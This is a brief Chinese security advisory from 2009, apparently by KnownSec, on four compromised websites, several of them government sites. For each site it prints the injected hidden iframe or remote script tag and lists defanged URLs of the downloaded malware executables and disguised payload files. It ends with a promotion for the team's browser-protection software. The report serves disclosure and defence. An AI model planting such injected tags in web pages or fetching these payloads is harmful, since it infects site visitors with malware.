知道创宇

发布时间：Tue Feb 24 2009 21:37:12 UTC+0800
最后更新时间：Tue Feb 24 2009 21:37:12 UTC+0800
________________________________________
知道创宇安全团队（KnownSec team）于今天捕获以下网站被植入恶意代码：东莞地产市场网、淄博市政府采购网、保定市人事局、中国通用航空协会官方网站、
 

东莞地产市场网（hxxp://www.dgfdc.net/newscenter/shownews.asp?newsid=32976）被植入恶意代码：
<script src=hxxp://3b%6Fmb.com/c.js></script>
通过漏洞攻击，最终下载病毒：
hxxp://w.wesy67.com/01/ok.exe
hxxp://w.wesy67.com/01/UUSee.CAB

淄博市政府采购网（hxxp://www.zbzfcg.gov.cn/）被植入恶意代码：
<iframe src=hxxp://www.jltao8.com/include/css/1.asp width=0 height=0></iframe>
通过漏洞攻击，最终下载病毒：
hxxp://w.qqnetcn.cn/d3.exe
hxxp://w.qqnetcn.cn/Baidu.cab
hxxp://w.muu998.com/UUSee.CAB
hxxp://w.qqnetcn.cn/dd.exe
 

保定市人事局（hxxp://www.bdrsj.gov.cn/）被植入恶意代码：
<script src=hxxp://www.419.com.cn/1.js></script>
通过漏洞攻击，最终下载病毒：
hxxp://l.bugxue.com/qwer/a15.css
hxxp://l.bugxue.com/qwer/ms.css
hxxp://l.bugxue.com/qwer/as.css
hxxp://l.bugxue.com/qwer/bf.css
hxxp://l.bugxue.com/qwer/re.css
hxxp://l.bugxue.com/qwer/real11.css
 

中国通用航空协会官方网站（hxxp://www.ga.gov.cn/）被植入恶意代码：
<iframe src=hxxp://www.good1685.cn/b3.htm width=50 height=0 border=0></iframe>
通过漏洞攻击，最终下载病毒：
hxxp://d.opqxn.com/new/a2.css
hxxp://d.bnksw.com/new/a1.css
 

推荐的应对方法： 安装365门神软件，对IE浏览器在打开网站的时候进行保护，拦截来自网络带有恶意代码的网页攻击。使用帮助和下载：http://365menshen.com

Popularity: 10% [?]